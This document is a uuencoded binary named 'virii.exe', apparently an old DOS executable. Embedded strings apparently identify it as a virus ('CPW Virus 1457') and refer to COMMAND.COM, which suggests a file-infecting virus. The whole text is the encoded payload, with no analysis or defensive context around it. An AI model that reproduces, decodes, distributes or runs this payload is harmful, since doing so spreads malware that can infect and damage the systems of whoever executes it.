begin 664 virii.exe
M35K:`0<````"`-`0___<```!``#[`(``'````$Q:.3'G_X7_`/]@M`<N_QX$
M`,^A2'0'M`7V8?HNJJKD_/_X_/_X_/_X_/_X_/_X_/_X_/_X_*JJ__C\__C\
M__C\__C\__C\__C\__C\__C\JJK_^/S_^/S_^/S_^/S_^/S_^/S_^/S_^/RJ
MJO_X_/_X_/_X_/_X_/_X_/_X_/_X_/_X_*JJ__C\__C\__C\__C\__C\__C\
M__C\__C\JJK_^/S_^/S_^/S_^/S_^/S_^/S_^/S_^/RJJO_X_/_X_/_X_/_X
M_/_X_/_X_/_X_/_X_*JJ__C\__C\__C\__C\__C\__C\__C\__C\JJK_^/S_
M^/S_^/S_^/S_^/S_^/S_^/S_^/RJJO_X_/_X_/_X_/_X_/_X_/_X_/_X_/_X
M_*JJ__C\__C\__C\__C\__C\__C\__C\__C\JJK_^/S_^/S_^/S_^/S_^/S_
M^/S_^/S_^/RJJO_X_/_X_/_X_/_X_/_X_/_X_/_X_/_X_*JJ__C\__C\__C\
M__C\__C\__C\__C\__C\JJK_^/S_^/S_^/S_^/S_^/S_^/S_^/S_^/RJJO_X
M_/_X_/_X_/_X_/_X_/_X_/_X_/_X_*JJ__C\__C\__C\__C\__C\__C\__C\
M__C\JJK_^/S_^/S_^/S_^/S_^/S_^/S_^/S_^/RJJO_X_/_X_/_X_/_X_/_X
M_/_X_/_X_/_X_*JJ__C\__C\__C\__C\__C\__C\__C\__C\JJK_^/S_^/S_
M^/P`\`'_^/S_^/S_^/S_^/RJJO_X_/_X_/_X_/_X_/_X_/_X_/_X_/_X_*JJ
M__C\__C\__C\__C\__C\__C\__C\__C\JJK_^/S_^/S_^/S_^/S_^/S_^/S_
M^/S_^/RJJO_X_/_X_/_X_/_X_/_X_/_X_/_X_/_X_*JJ__C\__C\__C\__C\
M__C\__C\__C\__C\JJK_^/S_^/S_^/S_^/S_^/S_^/S_^/S_^/RJJO_X_/_X
M_/_X_/_X_/_X_/_X_/_X_/_X_*JJ__C\__C\__C\__C\__C\__C\__C\__C\
MJJK_^/S_^/S_^/S_^/S_^/S_^/S_^/S_^/RJJO_X_/_X_/_X_/_X_/_X_/_X
M_/_X_/_X_*JJ__C\__C\__C\__C\__C\__C\__C\__C\JO__^/S_^/S_^/S_
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
D-L8`BH2T`/\&Q@"#/L8`$G4&QP;&````!UX?6EE;G<]53%,.
`
end